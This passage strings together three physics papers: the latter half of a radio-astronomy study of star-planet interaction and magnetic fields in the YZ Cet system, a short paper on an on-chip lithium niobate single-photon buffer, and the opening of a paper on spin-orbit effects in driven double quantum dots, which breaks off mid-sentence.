Fig. 4. During day 5 the flux density increases in the first part of the band (\(550-650\) MHz), then it is almost flat. During day 6 it increases on average, indicating that the spectrum probably extends to higher frequencies, with a possible cutoff at more than 1 GHz. For both days, the steep increase of the flux density seems to point to a minimum frequency of about 500 MHz, which could indicate a lower limit of the ECME.

Figure 3: Light-curve of the circularly polarized component of ARE in the two days of detection, folded to the orbital period of planet b.

Figure 4: Spectra of the circularly polarized component of ARE in the two days of detection. The spectrum is increasing towards high frequency, an indication that the high-frequency cutoff is beyond the limits of the figure.

## 6 Discussion

### Is the emission really due to SPI?
The orbital phases of the four detections define two sectors (blue areas in Figs. 1 and 2) that are symmetric with respect to the line of sight. The two sectors cover \(\pm\)(30\({}^{\circ}\) to 80\({}^{\circ}\)), with a total of 100\({}^{\circ}\) over 360\({}^{\circ}\). This symmetry strongly suggests that we are detecting ARE arising from SPI in the magnetosphere of the star, due to the sub-Alfvenic interaction with planet b, which can be explained in the framework of the hollow cone model. However, other emission mechanisms observed in M-type stars could be responsible for the observed emission. The radio emission from active M stars is highly variable and is characterized by the presence of two kinds of flares superimposed on a quiescent radio emission. Incoherent flares are transient increases of radio flux, usually weakly circularly polarized, with timescales of the order of hours, modelled within the framework of gyrosynchrotron emission from mildly relativistic electrons (Osten et al., 2005). The other kind of flares are coherent radio bursts, characterized by a high level of circular polarization (Villadsen & Hallinan, 2019) and timescales from seconds to hours. These characteristics are interpreted as ECME (Lynch et al., 2015; Zic et al., 2019). To date, the rate of coherent bursts in M-type stars is still unknown. Only for the most active, fast-rotating M-type dwarfs, such as AD Leo, UV Cet, EQ Peg, EV Lac and YZ CMi, have Villadsen & Hallinan (2019) been able to estimate a rate of 20% for catching a coherent burst at the same frequency as our observations. On the other hand, from a blind sky survey at low frequency (\(\leq 200\) MHz) Callingham et al. (2021) found a low rate of detection of coherent emission in M-type stars, about 0.5%. This emission seems to be uncorrelated with the activity indicators while, at GHz frequencies, there is a correlation with the Rossby number (McLean et al., 2012), i.e. with the magnetic activity. On the other hand, incoherent flares due to gyrosynchrotron emission have no suitable statistics for M-type stars. In any case, whatever the probability \(p\) of flares or coherent bursts, the overall probability to get 4 detections inside the two sectors and the other 5 non-detections outside them is given by \(p^{4}(1-p)^{5}\), which has a maximum of about \(2\times 10^{-3}\). This is a very low probability, and it occurs for \(p=0.44\), which is a very high flare rate, not suitable for the activity of YZ Cet.

Figure 5: Schematic view of the magnetic connection between star and planet. The stellar dipole is assumed to be perpendicular to the orbital plane. The axes of the ECME cones are tangent to the dipole line (angle \(\psi\) to the dipole axis). The aperture of the cone is \(\theta\) with thickness \(\Delta\theta\), centered in O.

The two coherent bursts reported by Pineda and Villadsen (2023) can be used as a test. Phasing their data with the ephemeris we used, we find that their two detections occur at phases 0.13 and 0.09 (Epochs 2 and 5), which fall inside our sectors; the non-detections occur at phases 0.63, 0.62 and 0.76 (Epochs 1, 3 and 4), which are outside our sectors. Considering all the data, 6 inside the sectors and 8 outside, the probability that flares or coherent bursts fall in this configuration is given by \(P_{\rm tot}=p^{6}(1-p)^{8}\), which has a maximum of \(7\times 10^{-5}\), corresponding to \(4.37\,\sigma\), for \(p=0.43\). We can conclude that the observed emission is ARE from SPI, with a degree of confidence of \((1-\max(P_{\rm tot}))\), i.e. 99.992%.
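The maxima of the binomial-type likelihoods above can be verified with a few lines of Python; this is a minimal numerical check of ours (the function and variable names are illustrative, and the conversion of the maximum probability into a significance in \(\sigma\) is taken from the text rather than recomputed here).

```python
def max_likelihood(n_in, n_out):
    """Maximum over p of p**n_in * (1 - p)**n_out, attained at p = n_in / (n_in + n_out)."""
    p = n_in / (n_in + n_out)
    return p, p ** n_in * (1.0 - p) ** n_out

# uGMRT detections alone: 4 inside the two sectors, 5 non-detections outside.
print(max_likelihood(4, 5))   # -> (p ~ 0.44, max ~ 2.1e-3)

# Including the two VLA bursts of Pineda & Villadsen (2023): 6 inside, 8 outside.
print(max_likelihood(6, 8))   # -> (p ~ 0.43, max ~ 7.0e-5)
```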
### Sub-Alfvenic regime

The perturbation caused by the planet crossing the stellar magnetosphere can propagate towards the star if the relative velocity \(v_{\rm rel}\) (see sect. 6.5) of the planet with respect to the magnetosphere is less than the Alfven velocity, given by \(v_{\rm Alf}=B/\sqrt{4\pi\rho_{\rm w}}\), where \(\rho_{\rm w}\) is the density of the wind (e.g. Lanza, 2009). The value of \(v_{\rm Alf}\) depends on the configuration of the magnetosphere, as it influences the density of the wind and therefore the ram pressure. Defining \(\eta(r)=\frac{B^{2}/8\pi}{\frac{1}{2}\rho_{\rm w}v_{\rm w}^{2}}\) as the ratio of magnetic to wind kinetic energy densities, the Alfven radius \(R_{\rm Alf}\) is where \(\eta(r)=1\). ud-Doula and Owocki (2002) define a "wind magnetic confinement parameter" \(\eta_{*}=B_{\rm p}^{2}R_{*}^{2}/(4\dot{M}v_{\rm w})\), which is \(\eta(R_{*})\) at the stellar surface. If \(\eta_{*}\gg 1\), then \(R_{\rm Alf}\gg R_{*}\), i.e. the Alfven radius lies relatively far from the star. We can define as "inner magnetosphere" the region where \(r<R_{\rm Alf}\); here the magnetic field lines are closed (as for mCP stars, see Trigilio et al., 2004). In the equatorial plane, assumed coincident with the orbital plane, \(\eta(r)\) is the local ratio \((v_{\rm Alf}/v_{\rm w})^{2}=M_{\rm A}^{-2}\), with \(M_{\rm A}\) the Alfvenic Mach number (ud-Doula and Owocki, 2002). Inside the inner magnetosphere, \(v_{\rm w}\ll v_{\rm Alf}\). For mid-M type stars with moderate or low activity, such as YZ Cet, Wood et al. (2021) find that \(\dot{M}\leq 0.2\,\dot{M}_{\odot}\). Adopting \(\dot{M}\approx 10^{-15}M_{\odot}\,{\rm yr}^{-1}\), \(B_{\rm p}\approx 2\,400\,{\rm G}\) (see sect. 6.5) and \(v_{\rm w}=300\,{\rm km\,s^{-1}}\) (Preusse et al., 2005), we get \(\eta_{*}\approx 10^{8}\), meaning that in YZ Cet the wind is strongly confined by the magnetic field. Following ud-Doula et al. (2008), who give \(R_{\rm Alf}\approx(0.3+\eta_{*}^{1/4})\,R_{*}\) when \(\eta_{*}\gg 1\), we get \(R_{\rm Alf}\approx 100\,R_{*}\), and therefore all three known planets of YZ Cet are inside the inner magnetosphere. In particular, for YZ Cet b, \(v_{\rm rel}=85.1\,{\rm km\,s^{-1}}\) (see sect. 6.5), therefore \(v_{\rm rel}\ll v_{\rm w}\ll v_{\rm Alf}\) and the planet moves in the sub-Alfvenic region.

### The hollow cone model

Since the ARE is highly directive, the emission pattern being either a hollow cone or a narrow beam (as in the case of the tangent plane beaming), it is better to visualize the light curve in a polar diagram, as shown in Fig. 2. Here the visibility of the emission can be correlated with the position of planet b along the orbit.

Figure 6: Schematic view of the emission pattern of the ARE. Directions are projected onto a spherical surface of unit radius. The ECME pattern is a hollow cone, represented by the blue ring on the sphere. The emission originates in the dipolar field line connecting the planet and the star at the point O and it rotates following the planet. The radiation is directed toward the Earth when the line of sight (point E) intercepts the cone (blue circular corona) between points A-B and C-D. This occurs when the projection E\({}^{\prime}\) of E in the plane of the orbit intercepts the projection of the blue ring (the orange ellipse) between points A\({}^{\prime}\)-B\({}^{\prime}\) and C\({}^{\prime}\)-D\({}^{\prime}\).

Figure 7: Projection of one possible configuration in the plane of the orbit (horizontal plane of Fig. 6). The projection of the hollow cone is the area between the orange and the green ellipses. The projection of the line of sight (point E\({}^{\prime}\)) rotates and intercepts the two ellipses between points A\({}^{\prime}\)-B\({}^{\prime}\) and C\({}^{\prime}\)-D\({}^{\prime}\). Here \(i=88^{\circ}\) and E\({}^{\prime}\) describes a circle of radius \(\approx 1\). ARE is visible from Earth when E\({}^{\prime}\) is between A\({}^{\prime}\) and B\({}^{\prime}\) or between C\({}^{\prime}\) and D\({}^{\prime}\). O is the origin of the emission.

We find that the radio emission is detected only when the planet is in
two orbital sectors that are symmetric with respect to the direction of Earth. In the case of the tangent plane beam model, the emission is expected near quadrature, while here the two sectors are at about \(\pm(30^{\circ}\) to \(80^{\circ})\) from the direction of the Earth (the two blue sectors in Fig. 2). Therefore, our data are consistent with a hollow cone beam model for the ARE. In this model, the emission occurs in the dipolar flux tube connecting the planet and the star, as shown in Fig. 5. The hollow cone has a semi-aperture \(\theta\) given by \(v/c\), where \(v\) is the velocity of the resonant electrons and \(c\) the speed of light, and a thickness \(\Delta\theta\approx v/c\). The emission is visible from Earth when the line of sight falls inside the walls of the cone. This is shown in the schematic picture of Fig. 6, where the hollow cone intercepts the sphere of unit radius in a circular ring. The points A, B and C, D indicate the moments of start and stop of visibility of ARE before and after the pseudo transit of the planet. Here we assume, for simplicity, that the axis of the dipole of the star coincides with the rotational axis. The visibility depends on \(v/c\), on the location of the source of emission in the dipolar loop, which is defined by the angle \(\psi\), and on the inclination \(i\). In order to identify possible values of the parameters, we project the circular emission ring onto the orbital plane, as in Fig. 7. The circular ring is defined by two ellipses that intercept the projection \(\mathrm{E}^{\prime}\) of the line of sight at four points \(\mathrm{A}^{\prime}\), \(\mathrm{B}^{\prime}\) and \(\mathrm{C}^{\prime}\), \(\mathrm{D}^{\prime}\). With this simple geometrical model it is possible to infer that \(v/c\) lies in the range \(0.3-0.8\), and the inclination \(i\) is between \(30^{\circ}\) and \(60^{\circ}\). In Fig. 7 a possible configuration corresponding to the observed emission pattern is shown. The solid angle \(\Omega\) subtended by the cone is defined by \(\theta\) and \(\Delta\theta\), which are given by \(v/c\). For the range of \(v/c\) that we find, \(\Omega\approx 1.8-3\,\mathrm{sr}\). We observe a high degree of circular polarization on days 5 and 6, with positive values of Stokes V. This means that, if the emission is in the x-mode, it is produced in the Northern magnetic hemisphere. It is worth noting that the true stellar magnetic field topology and the real geometry of the system (i.e. the inclination of the dipole axis with respect to the exoplanet orbital plane and with respect to the line of sight) are basically unknown. This prevents us from providing firm conclusions regarding some observational evidence, mainly the non-detection of circular polarization on days 3 and 4. We can only suggest that one possible explanation is that on days 3 and 4 we observe radiation emitted from the two hemispheres simultaneously.
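As a rough cross-check of the quoted solid-angle range, one can adopt the common loss-cone geometry in which the hollow cone has a half-opening angle \(\theta\approx\arccos(v/c)\) and a wall thickness \(\Delta\theta\approx v/c\), so that \(\Omega\approx 2\pi\sin\theta\,\Delta\theta\). This specific geometric assumption is ours (used only for illustration, and it may differ in detail from the authors' model), but it reproduces the 1.8-3 sr range quoted above for \(v/c=0.3-0.8\):

```python
import numpy as np

def hollow_cone_solid_angle(beta):
    """Solid angle (sr) of a thin hollow emission cone with half-opening angle
    theta = arccos(beta) and wall thickness ~ beta, where beta = v/c.
    Illustrative geometry: Omega ~ 2*pi*sin(theta)*delta_theta."""
    theta = np.arccos(beta)
    return 2.0 * np.pi * np.sin(theta) * beta

for beta in (0.3, 0.8):
    print(beta, hollow_cone_solid_angle(beta))   # ~1.8 sr and ~3.0 sr
```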
### The Stellar magnetic field

The spectrum of the ECME is directly connected with the local magnetic field strength \(B\). The frequency of the maser is given by \(\nu=s\cdot 2.8\,B\) MHz, where \(s=1,2,3,4\) is the harmonic number, \(B=B_{\mathrm{p}}(R_{*}/r)^{3}\), \(B_{\mathrm{p}}\) is the magnetic field strength at the pole of the star and \(r\) the radial distance above the pole where the ECME forms in a dipolar topology (Trigilio et al., 2000). We fix \(s=2\) as the first harmonic is likely to be suppressed by the second harmonic of the gyrofrequency of the surrounding plasma (Melrose and Dulk, 1982; Trigilio et al., 2000) and the higher harmonics have a small intensity. The spectra in Fig. 4 seem to point to a low-frequency cutoff of about \(\nu_{\mathrm{min}}\approx 500\,\mathrm{MHz}\), which corresponds to \(B_{\mathrm{min}}\approx 90\,\mathrm{G}\) above the stellar pole, at a distance \(r_{\mathrm{max}}\) from the centre. The region of the magnetic loop where the ECME develops can be estimated when the cutoff of the spectrum and the polar magnetic field are known. We have these data for the Jupiter-Io DAM emission and for the mCP star CU Vir. For Io-DAM, the spectrum extends from 3 to 30 MHz (Zarka et al., 2004), with \(B_{\mathrm{p}}=14\,\mathrm{G}\). For CU Vir, Das and Chandra (2021) find that the low frequency cutoff is below their observing band, at about 300 MHz, and the upper frequency cutoff is at about 3000 MHz, with \(B_{\mathrm{p}}=3000\,\mathrm{G}\). For a dipolar field topology, the ECME originates at \(r\approx 1.4-3\,R_{*}\) from the center of the dipole. Assuming the same range of \(r\) for YZ Cet, the polar magnetic field strength is
\[B_{\mathrm{p}}=\frac{\nu_{\mathrm{min}}/\mathrm{MHz}}{s\cdot 2.8\cdot(R_{*}/r_{\mathrm{max}})^{3}}\,\mathrm{G} \tag{1}\]
that gives \(B_{\mathrm{p}}\lessapprox 2\,400\,\mathrm{G}\) for \(s=2\). This value is in agreement with what is expected for an M4.5V star (e.g. Kochukhov and Lavail, 2017; Kochukhov and Reiners, 2020) and, in particular, with the value of 2.2 kG given by Moutou et al. (2017). This is just a first estimate, as the best value of \(B_{\mathrm{p}}\) can be provided only if the whole spectrum, including the high frequency cutoff, is known. The frequencies corresponding to the range of \(r\) given above are \(\nu_{\mathrm{max}}-\nu_{\mathrm{min}}\approx 4900-500\,\mathrm{MHz}\), with \(\Delta\nu\approx 4400\,\mathrm{MHz}\).
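Equation (1) can be evaluated directly with the values quoted above; the short numerical check below is ours (function and variable names are illustrative) and reproduces both the \(B_{\rm p}\approx 2.4\) kG estimate and the local field of about 90 G at \(r_{\max}=3\,R_{*}\).

```python
def polar_field(nu_min_mhz, s, r_max_over_rstar):
    """Polar field strength (G) from Eq. (1): B_p = nu_min / (s * 2.8 * (R_*/r_max)^3)."""
    return nu_min_mhz / (s * 2.8 * (1.0 / r_max_over_rstar) ** 3)

B_p = polar_field(500.0, 2, 3.0)
print(B_p)                       # ~2410 G, i.e. B_p <~ 2.4 kG
print(B_p * (1.0 / 3.0) ** 3)    # local field at r_max = 3 R_*: ~89 G (B_min ~ 90 G)
```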
### The Planetary magnetic field

The power emitted by the ECME, inferred from the observations, can be obtained as
\[P_{\mathrm{obs}}=F_{\nu}\,\Delta\nu\,2\Omega\,d^{2} \tag{2}\]
where \(F_{\nu}=0.5\,\mathrm{mJy}\) is the average flux density of the emission inside the hollow cone, \(\Delta\nu\) is the bandwidth of the ECME (see sect. 6.4), \(\Omega\) the solid angle subtended by the hollow cone of emission (see sect. 6.3) and \(d\) is the distance to the star. The factor 2 accounts for the two hemispheres, which we assume emit the same power but at opposite circular polarization. We get \(P_{\mathrm{obs}}\) in the range between \(1.0\times 10^{22}\,\mathrm{erg\,s^{-1}}\) and \(1.7\times 10^{22}\,\mathrm{erg\,s^{-1}}\), corresponding to the range of \(\Omega\). On the other hand, the emitted power \(P_{\mathrm{obs}}\) is a fraction \(\epsilon\) of the incident power \(P_{\mathrm{in}}\) due to the interaction between the stellar magnetosphere and the planet (e.g. Zarka, 2007; Lanza, 2009). This is given by
\[P_{\mathrm{in}}=A\,v_{\mathrm{rel}}B^{2}/8\pi \tag{3}\]
where \(A\) is the cross section of the planet, \(v_{\mathrm{rel}}\) is the velocity of the planet relative to the magnetic field of the star and \(B\) the magnetic field of the star at the position \(r\) of the planet. Assuming that the orbital plane coincides with the magnetic equatorial plane of the star, \(B=\frac{1}{2}\,B_{\mathrm{p}}(R_{*}/r)^{3}\). Since for YZ Cet b \(r=21.9\,R_{*}\), and considering that \(B_{\mathrm{p}}\) is an upper limit, \(B\leq 0.1\,\mathrm{G}\). The relative velocity is \(v_{\mathrm{rel}}=|v_{\mathrm{orb}}-v_{\mathrm{cor}}|\), where \(v_{\mathrm{orb}}=87.6\,\mathrm{km\,s^{-1}}\) is the orbital velocity of the planet and \(v_{\mathrm{cor}}=2.5\,\mathrm{km\,s^{-1}}\) is the co-rotational velocity at the position of the planet. If the planet does not have a magnetic field, \(A=\pi\,R_{\mathrm{planet}}^{2}\). In this case \(P_{\mathrm{in}}\leq 4.3\times 10^{21}\,\mathrm{erg\,s^{-1}}\), a value that is smaller than \(P_{\mathrm{obs}}\). Since \(P_{\mathrm{in}}\) must be \(\geq P_{\mathrm{obs}}\), the only possibility is to consider an increase of the cross section \(A\) by a factor of at least 2.4 or 4.0, corresponding to the range of \(\Omega\). This implies the presence of a planetary magnetic field. In this case \(A=\pi\,R_{\mathrm{MP}}^{2}\), where \(R_{\mathrm{MP}}\) is the radius of the magnetopause, i.e. the distance from the centre of the planet where its magnetic field strength equals \(B\). The condition \(P_{\mathrm{in}}\geq P_{\mathrm{obs}}\) translates into \(R_{\mathrm{MP}}\geq 1.6\,R_{\mathrm{planet}}\) and \(R_{\mathrm{MP}}\geq 2.0\,R_{\mathrm{planet}}\), corresponding to the range of \(\Omega\). Assuming a dipolar field for the planetary magnetosphere,
\[R_{\mathrm{MP}}=R_{\mathrm{planet}}(B_{\mathrm{planet}}/B)^{1/3} \tag{4}\]
the above conditions imply \(B_{\mathrm{planet}}\geq 0.4\,\mathrm{G}\) and \(B_{\mathrm{planet}}\geq 0.9\,\mathrm{G}\). Moreover, if the "generalized radiomagnetic Bode's law" with \(P_{\mathrm{obs}}/P_{\mathrm{in}}\approx 0.01\) (Zarka, 2007) were valid for our system, the above limits would increase considerably.

## 7 Conclusions

Our main finding is the detection of highly circularly polarized radio emission in the YZ Cet system that is consistent with being due to ARE from SPI. The spectrum of the ARE and the correlation with the position of the planet along the orbit allow us to estimate the magnetic field of the star and the characteristics of the emission cone. The comparison between the radiated power and the incident magnetic power allows us to infer the presence of a magnetosphere around the planet. We estimate a lower limit for the magnetic field of the planet YZ Cet b of 0.4 G. If confirmed, this would be the first (indirect) measurement of a planetary magnetic field. We find that the strong radio emission from the interaction between YZ Cet b and its star is detected only when the planet is in two orbital sectors that are symmetric with respect to the direction of Earth. This behavior can be explained within the framework of the hollow cone beam model for the ARE, and is in contrast with the tangent plane beam model, where the emission is expected to increase near the quadratures, as found in e.g. the Proxima b - Proxima system (Perez-Torres et al., 2021).
Radio follow-up observations of this system will allow us to constrain better some of the most relevant parameters responsible for the observed ARE, e.g., the low- and high-frequency cutoffs, or the solid angle, \(\Omega\) covered by the ARE. We emphasize that our work outlines a promising method for the study of SPI and for the indirect detection of planetary magnetospheres. Both are important in defining the exoplanet environment and hence the possibility of favourable conditions for the evolution of life. We thank the staff of the GMRT who have made these observations possible. The GMRT is run by the National Centre for Radio Astrophysics of the Tata Institute of Fundamental Research. We acknowledge support of the Department of Atomic Energy, Government of India, under project no. 12-R&D-TFR-5.02-0700. BD acknowledges support from the Bartol Research Institute. MPT acknowledges financial support through grants CEX2021-001131-S and PID2020-117404GB-C21 funded by the Spanish MCIN/AEI/ 10.13039/501100011033.
2301.04140
High Resolution On-Chip Thin-Film Lithium Niobate Single-Photon Buffer
We experimentally demonstrate a room-temperature, voltage controlled, short-term quantum photonics memory on a lithium niobate chip. Our chip is capable of resolving 100 ps time steps with 0.74 dB loss per round-trip.
Cagin Ekici, Yonghe Yu, Jeremy C. Adcock, Alif Laila Muthali, Heyun Tan, Hao Li, Leif Katsuo Oxenløwe, Xinlun Cai, Yunhong Ding
2023-01-10T13:17:23Z
http://arxiv.org/abs/2301.04140v1
# High Resolution On-Chip Thin-Film Lithium Niobate Single-Photon Buffer

###### Abstract

We experimentally demonstrate a room-temperature, voltage controlled, short-term quantum photonics memory on a lithium niobate chip. Our chip is capable of resolving 100 ps time steps with 0.74 dB loss per round-trip.

1 Center for Silicon Photonics for Optical Communication (SPOC), Department of Electrical and Photonics Engineering, Technical University of Denmark, Lyngby, Denmark 2 State Key Laboratory of Optoelectronic Materials and Technologies, School of Electronics and Information Technology, Sun Yat-sen University, Guangzhou 510275, China *[email protected]

## 1 Introduction

Short-term quantum photonics memories or single-photon buffers are essential for quantum technologies, since they provide a synchronization scheme for matching independent systems functioning at different speeds. In order to optimize two-photon interference from distant sources in a quantum network, photon buffers with high-resolution configurability are needed to store one photon until the other is transmitted [1]. In addition, entangling quantum operations in photonics are generally probabilistic, and such short-term memories play a crucial role in buffering these probabilistic gates. Furthermore, approaching ideal single-photon sources based on parametric spontaneous pair generation through temporal multiplexing requires low-loss and controllable photon storage [2, 3]. To date, optical buffers based on delay lines [4], slow light [5], and Bragg scattering four-wave mixing [6] have been introduced. All these techniques either have an excessive loss, which is not suitable for quantum applications, or are overly sophisticated. Although atomic cloud optical memories are main contenders, they are difficult to integrate and only operate at specific wavelengths. Therefore, to fulfill the requirements of a single-photon buffer, thin-film lithium niobate (TFLN) based integrated photonics platforms are ideal candidates, since they offer voltage-controlled, low-loss and high-speed interferometric switching. In this paper, we experimentally demonstrate an on-chip TFLN single-photon buffer based on a recirculating 1 cm-long loop with a round-trip time of 100 ps, i.e. the overall delay can be controlled with 100 ps time resolution, with storage times of up to 1.4 ns (14 round trips).

## 2 Experimental Setup and Results

The TFLN single-photon buffer was fabricated on a commercial lithium niobate on insulator (LNOI) platform with a top LN thickness of 600 nm. The switch consists of a 4.5 mm-long LN phase modulator operated in push-pull mode, exhibiting a bandwidth of more than 40 GHz, as shown in Fig. 1 (b), and the whole chip insertion loss is less than 6.2 dB (including the coupling loss).

Figure 1: (a) Schematics of the experimental setup with a real image of the TFLN chip containing several buffers. (b) Electro-optic bandwidth (S\({}_{21}\)) measurement. Abbreviations: FPGA: Field-Programmable Gate Array, VOA: Variable Optical Attenuator, UC: Ultrafast Comparator, EA: Electronic Amplifier, TFLN S-PB: TFLN Single-Photon Buffer.

The experimental setup is shown in Fig. 1 (a). We conduct the experiments utilizing heavily-attenuated light from a laser (1550 nm, 40 fs pulse duration), i.e. a weak coherent state, with a 100 MHz repetition rate instead of true single-photon quantum states. The switch control signals are generated via an FPGA and are fed into an ultrafast comparator to obtain a fast fall-rise time.
Afterwards, the fast signals are amplified to the \(V_{\pi}\) of the TFLN switch, and are applied to the chip through high-speed radio frequency (RF) probes using micropositioners. After storage and read-out for a chosen delay, photons are detected by superconducting nanowire single-photon detectors and recorded by a time-tagger, which produces a real-time histogram of the detection events. The experimental results of single-photon storage with our TFLN chip are shown in Fig. 2. Normalized histogram counts for the first 5 round-trips are depicted in Fig. 2 (a). The round-trip loss performance of the chip as a function of time is exhibited in Fig. 2 (b). The peak values after each round-trip have been fitted with a line of slope 0.74 dB per round-trip. Accordingly, we measure the second-order correlation function \(g^{(2)}(0)\) after each round-trip by adding a 50/50 fiber optic beam splitter before the detection, see Fig. 2 (c). As expected, \(g^{(2)}(0)\approx 1\), since our TFLN photonics chip is illuminated by a weak coherent state. As a result of the constant \(g^{(2)}(0)\approx 1\) for every round-trip, it can be inferred that the statistics do not change significantly as a function of storage time and that there is no substantial optical background noise, owing to the absence of an optical pump beam [7].

## 3 Conclusion

We present an experimental study of a recirculating on-chip TFLN single-photon buffer enabling single photons to be captured, stored, and read out at will with 100 ps time-step resolution in a reliable way. Our promising chip is a robust and scalable architecture working at room temperature with a low loss of around 0.74 dB per round-trip.
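For intuition about the operating range, the delay and transmission scale simply with the number of round trips. The sketch below is a back-of-envelope estimate of ours (not a result from the paper), using only the 100 ps round-trip time and the 0.74 dB per-round-trip loss quoted above; it ignores the fixed chip insertion loss.

```python
ROUND_TRIP_TIME_PS = 100.0   # round-trip time of the 1 cm loop (paper value)
LOSS_DB_PER_TRIP = 0.74      # fitted loss per round trip (paper value)

def buffer_point(n_round_trips):
    """Return (delay in ns, accumulated loop loss in dB, transmission) after n round trips."""
    delay_ns = n_round_trips * ROUND_TRIP_TIME_PS / 1000.0
    loss_db = n_round_trips * LOSS_DB_PER_TRIP
    return delay_ns, loss_db, 10.0 ** (-loss_db / 10.0)

print(buffer_point(5))    # ~0.5 ns delay, 3.7 dB, ~43% transmission
print(buffer_point(14))   # ~1.4 ns delay, ~10.4 dB, ~9% transmission (longest storage shown)
```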
2302.12272
Photo-assisted spin transport in double quantum dots with spin-orbit interaction
We investigate the effect of spin-orbit interaction on the intra- and interdot particle dynamics of a double quantum dot under ac electric fields. The former is modeled as an effective ac magnetic field that produces electric-dipole spin resonance transitions, while the latter is introduced via spin-flip tunneling amplitudes. We observe the appearance of non-trivial spin-polarized dark states, arising from an ac-induced interference between photo-assisted spin-conserving and spin-flip tunneling processes. These dark states can be employed to precisely measure the spin-orbit coupling in quantum dot systems. Furthermore, we show that the interplay between photo-assisted transitions and spin-flip tunneling allows the system to operate as a highly tunable spin filter. Finally, we investigate the operation of the system as a resonant flopping-mode qubit for arbitrary ac voltage amplitudes, allowing for high tunability and enhanced qubit control possibilities.
David Fernández-Fernández, Jordi Picó-Cortés, Sergio Vela Liñán, Gloria Platero
2023-02-23T19:00:04Z
http://arxiv.org/abs/2302.12272v2
# Photo-assisted spin transport in double quantum dots with spin-orbit interaction ###### Abstract We investigate the effect of spin-orbit interaction on the intra- and interdot particle dynamics of a double quantum dot under ac electric fields. The former is modeled as an effective ac magnetic field that produces electric-dipole spin resonance transitions, while the latter is introduced via spin-flip tunneling amplitudes. We observe the appearance of non-trivial spin-polarized dark states, arising from an ac-induced interference between photo-assisted spin-conserving and spin-flip tunneling processes. These dark states can be employed to precisely measure the spin-orbit coupling in quantum dot systems. Furthermore, we show that the interplay between photo-assisted transitions and spin-flip tunneling allows the system to operate as a highly tunable spin filter. Finally, we investigate the operation of the system as a resonant flopping-mode qubit for arbitrary ac voltage amplitudes, allowing for high tunability and enhanced qubit control possibilities. * 27 February 2023 _Keywords_: semiconductor quantum dots, spin-orbit coupling, quantum transport, spin qubits, dark states, ac-driving dynamics and transport, electron dipole spin resonance ## 1 Introduction Semiconductor spin qubits are among the most promising platforms for the implementation of quantum computing [1, 2, 3, 4, 5, 6, 7, 8]. Some of their main advantages are the long coherence times and the promise of high scalability to achieve the large number of qubits needed for the realization of quantum algorithms [9, 10, 11, 12, 13, 14]. In these systems, qubits are encoded in the spin states of electrons or holes localized in quantum dots (QDs). Manipulation of the qubit states can be performed employing electron spin resonance (ESR) [15, 16, 17, 18] by applying an oscillating magnetic field. However, the localization of the ac magnetic fields needed to address individual dots is experimentally challenging [15]. To overcome this limitation, an effective ac magnetic field is generated by electrically driving the particle in a material with strong spin-orbit coupling (SOC) [19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30], a magnetic field gradient [31, 32, 33], a spatially dependent hyperfine field [34, 35], or modulated anisotropies of the effective \(g\)-factor [36, 37, 38]. All these alternatives allow for electrical manipulation via the so-called electric-dipole spin resonance (EDSR), which in recent years has been widely employed to obtain high-fidelity one- and two-qubit gates [39, 40, 41, 42, 43, 44, 45, 46, 47]. In a double quantum dot (DQD), the particle (electron or hole) is delocalized between the two sites, giving rise to molecular-like orbitals. The addition of an ac electric or magnetic field results in unusual properties that arise from quantum coherence and, in particular, from quantum interferences. Some of the most relevant examples in QD systems are charge and spin dynamical localization [48, 49, 50, 51], spin filtering [52, 53, 54], or long-range transfer mediated by photo-assisted tunneling (PAT) [55, 56, 57]. These effects can be analyzed using Floquet theory [58, 59, 60], which is an excellent tool for addressing time-periodic Hamiltonians. Although all of these phenomena have been widely studied both theoretically and experimentally, the consequences of adding a strong SOC have only begun to be extensively analyzed in recent years [61, 62, 63, 64]. 
In particular, the transport signatures under both strong SOC and large ac voltage amplitudes have not been widely investigated. Transport through such a system is characterized by a spin-polarized current due to the finite probability of spin-flip tunneling between states of opposite spin in different QDs. In the presence of an ac electric field, these transitions can occur with the absorption or emission of one or more photons. We analyze the current and spin polarization through the system, including the effect of excited states via an effective magnetic field. Furthermore, within a certain parameter configuration, we find a set of non-trivial dark states (DS) in which interference between PAT spin-conserving and spin-flip transitions occurs. These processes yield a complex and nonlinear current output with remarkable features, including a potential read-out mechanism of the SOC. Lastly, we consider the possibility of employing the setup as a flopping-mode qubit, in which virtual transitions between the QDs in the presence of a strong SOC allow for fully coherent manipulation of the spin. The flopping-mode qubit has recently gained attention as a promising platform for quantum computing in solid-state systems [65, 66, 67].

## 2 Theoretical framework

We consider the following Hamiltonian for the DQD (\(\hbar=1\))
\[\hat{H}(t)=\hat{H}_{0}(t)+\hat{H}_{1}(t), \tag{1a}\]
\[\hat{H}_{0}(t)=\sum_{\eta;\sigma}\epsilon_{\eta}(t)\hat{d}_{\eta,\sigma}^{\dagger}\hat{d}_{\eta,\sigma}+\sum_{\eta}\frac{E_{z}}{2}\hat{\sigma}_{z,\eta}+\sum_{\eta\neq\eta^{\prime};\sigma,\sigma^{\prime}}\tau_{\eta,\sigma;\eta^{\prime},\sigma^{\prime}}\left(\hat{d}^{\dagger}_{\eta,\sigma}\hat{d}_{\eta^{\prime},\sigma^{\prime}}+h.c.\right), \tag{1b}\]
\[\hat{H}_{1}(t)=\sum_{\eta}\frac{\beta_{\eta}(t)}{2}\hat{\sigma}_{x,\eta}, \tag{1c}\]
where \(\hat{d}_{\eta,\sigma}\) (\(\hat{d}^{\dagger}_{\eta,\sigma}\)) is the annihilation (creation) operator at site \(\eta\in\{\rm L,R\}\), with spin \(\sigma\in\{\uparrow,\downarrow\}\). The first term in \(\hat{H}_{0}\) represents the QD energy levels \(\epsilon_{\eta}(t)\), which can be controlled by electric gates applied to individual dots. We consider a sinusoidal time-dependent gate in the leftmost dot: \(\epsilon_{\eta}(t)=\epsilon_{\eta,0}+\epsilon_{\rm ac}\cos(\omega t)\delta_{\eta,\rm L}\). The second term is the Zeeman splitting \(E_{z}=g\mu_{\rm B}B_{z}\), due to the external magnetic field applied perpendicularly to the plane of the QDs. The third term represents the hopping between dots. We consider two possible tunneling paths: a spin-conserving path \(\propto\delta_{\sigma,\sigma^{\prime}}\) of amplitude \(\tau_{0}\) and a spin-flip path with \(\sigma\neq\sigma^{\prime}\) of amplitude \(\tau_{\rm sf}\) that arises due to the SOC. The direction of the SOC determines the form of the spin-flip tunneling term. Using the SOC vector \(\mathbf{\alpha}\) [68, 66], the spin-flip term is \(\propto\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}}\). Here, without loss of generality, we consider \(\mathbf{\alpha}\) in the y-direction, such that \(\tau_{\rm 